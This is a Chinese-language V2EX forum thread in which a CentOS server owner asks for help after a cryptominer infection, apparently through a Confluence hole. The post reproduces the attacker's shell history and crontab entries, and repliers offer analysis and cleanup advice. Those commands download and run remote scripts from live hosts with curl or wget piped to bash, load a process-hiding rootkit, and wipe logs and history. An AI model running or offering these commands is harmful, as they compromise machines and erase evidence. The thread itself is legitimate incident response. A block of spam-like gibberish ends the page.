[求助] 系统中毒了,找到了进程和文件,无法杀死和删除 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
quadrapop
V2EX    CentOS

[求助] 系统中毒了,找到了进程和文件,无法杀死和删除

  •  
  •   quadrapop 2022-12-02 16:30:34 +08:00 3550 次点击
    这是一个创建于 1046 天前的主题,其中的信息可能已经有所发展或是发生改变。

    直接进入主题

    操作日志

    1 export TERM=xterm 2 top 3 /usr/lib/sys/rcu_bj 4 cd /usr/lib/sys/ 5 ls 6 chmod +x rcu_bj 7 ./rcu_bj 8 chattr -ia rcu_bj 9 ./rcu_bj 10 cd / 11 mkdir .a 12 cd .a 13 git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git 14 cd hiding-cryptominers-linux-rootkit/ 15 ls 16 make 17 dmesg 18 dmesg -C 19 ls 20 make 21 ls 22 make 23 make 24 cd .. 25 rm -rf hiding-cryptominers-linux-rootkit/ 26 curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu 27 ./rcu 28 top 29 rm -rf /var/log/* 30 cat /dev/null > ~/.bash_history 31 id 32 curl http://123.30.179.206:8189/solr/.v7/api | bash 33 ps auxw --sort=%cpu|tail -10 34 lscpu 35 ps auxw --sort=%cpu|tail -10 36 ps auxw --sort=%cpu|tail -10 37 ps auxw --sort=%cpu|tail -10 38 ps aux | grep rcu 39 python -c 'import pty; pty.spawn("/bin/bash")' 

    帮忙解读下这段脚本都干嘛了-_-

    https://github.com/alfonmga/hiding-cryptominers-linux-rootkit

    下载的这个脚本看用途是用来隐藏文件夹和进程的

    3 个可疑文件看起来没有隐藏文件属性,但是无法删除

    [root@localhost profile.d]# cd /usr/lib/sys [root@localhost sys]# ll 总用量 8 -rwxr-x--x 1 root confluence 0 12 月 1 18:38 rcu_bj -rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk -rwxrwx--- 1 root root 1199 11 月 14 11:01 rcu_udev -rwxr-x--- 1 root confluence 0 11 月 14 18:02 systemd [root@localhost sys]# lsattr rcu_bj ---------------- rcu_bj 您在 /var/spool/mail/root 中有邮件 [root@localhost sys]# lsattr rcu_libk ---------------- rcu_libk [root@localhost sys]# lsattr rcu_undev lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时 [root@localhost sys]# lsattr rcu_udev ---------------- rcu_udev 

    进程也杀不死

    [root@localhost sys]# ps -ef|grep rcu root 8 2 0 4 月 13 ? 00:00:06 [rcu_bh] root 9 2 0 4 月 13 ? 22:01:59 [rcu_sched] root 168224 243031 0 16:28 pts/24 00:00:00 grep --color=auto rcu 

    各位大佬接下来应该怎么办呀

    第 1 条附言    2022-12-02 17:52:48 +08:00
    [root@localhost sys]# alias alias cp='cp -i' alias egrep='egrep --color=auto' alias fgrep='fgrep --color=auto' alias grep='grep --color=auto' alias l.='ls -d .* --color=auto' alias ll='ls -l --color=auto' alias ls='ls --color=auto' alias mv='mv -i' alias rm='rm -i' alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde' [root@localhost sys]# crontab -l 

    alias看起来正常,定时任务之前有一个我已经删掉了,查看端口也没有发现什么异常,应该是通过那个rootkit

    隐藏了什么东西-_-

    第 2 条附言    2022-12-05 14:29:24 +08:00
    [root@localhost home]# crontab -u confluence -l */3 * * * * (curl -fsSL https://pastebin.com/raw/NfCRw0LF||wget -q -O- https://pastebin.com/raw/NfCRw0LF|| bash -sh * * * * * curl -fsSL http://j0llychic.com/mkdir_trace2.sh | bash > /dev/null 2>&1 */30 * * * * confluence /var/tmp/.crontab/crontab 

    这个用户发现了几个定时任务

    8 条回复    2022-12-05 16:02:26 +08:00
    dier
        1
    dier  
       2022-12-02 17:46:15 +08:00
    检查一下 alias 有没有配置陌生的别名
    试试修改这个文件的权限
    检查一下 crontab
    尝试编辑随便编辑文件内容或修改文件名

    看能不能阻止自动启动
    quadrapop
        2
    quadrapop  
    OP
       2022-12-02 17:56:59 +08:00
    @dier alias 和调度器都看起来正常。
    脚本中的 http://1.234.16.54:7070/apiapi/api/raw/master/s.zip
    我下下来有差不多 6M ,但是文件是损坏的
    Nitroethane
        3
    Nitroethane  
       2022-12-02 19:40:04 +08:00
    首先不确定你给出的 bash 历史记录是否是完整的,因为 "/usr/lib/sys/rcu_bj" 这个文件像是攻击者植入的,默认系统没有这个文件。
    从 GitHub 克隆的这个项目的用途是使用内核模块隐藏挖矿木马的进程信息和 CPU 使用率。
    从 1.234.16.54 这个网站下载的 s.zip 不是压缩文件,是一个 ELF ,把 sha256 扔到 virustotal 上发现它是一个挖矿木马。
    至于请求 123.30.179.206 这个 URL ,我手动访问了下,返回是 404 ,看命令的话,正常情况应该是一个 shell 脚本,猜测可能是做横向移动用的。

    首先你得确认攻击者是从什么入口进来的,通过对公网开放的端口大致可以确定。然后搞清楚攻击者通过这个入口进来后拿到的是什么权限,如果是 root 的话可以考虑备份重要数据然后重装了。不过还是得确定从什么入口进来,要把相应的漏洞修复,否则以后还会中招。
    Nitroethane
        4
    Nitroethane  
       2022-12-02 19:42:26 +08:00
    至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。
    cxh116
        5
    cxh116  
       2022-12-02 19:51:07 +08:00
    这种情况应该第一时间关机.

    再 u 盘启动,备份数据.防止重要数据被删除或加密了.到时怕交 BTC 也拿不回.
    之后再 chroot 修,或直接重装,再把数据拷进去.
    quadrapop
        6
    quadrapop  
    OP
       2022-12-05 14:14:37 +08:00
    @Nitroethane
    操作记录只有这么多了,这一段脚本中应该是把日志删除了
    这个 rootkit 可以隐藏进程和 cpu 使用率,我搜了下,没找到怎么把隐藏的给显示出来。
    现在也不太确定时候从哪个端口进来的,外网几个映射端口已经关掉了-_-
    就是这 2 个进程也不知道应该怎么办。
    Nitroethane
        7
    Nitroethane  
       2022-12-05 16:00:09 +08:00
    @quadrapop

    注意看我的回复:至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。

    通过 /usr/lib/sys 目录下那两个挖矿木马的文件属性判断,应该是通过 confluence 的漏洞进来的。前段时间 confluence 爆出过好几个高危漏洞,赶紧升级下吧。
    Nitroethane
        8
    Nitroethane  
       2022-12-05 16:02:26 +08:00
    你贴出来的这些权限维持操作不是同一个人做的,这台服务器应该是像公交车一样,被很多人上了
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     5481 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 22ms UTC 08:31 PVG 16:31 LAX 01:31 JFK 04:31
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86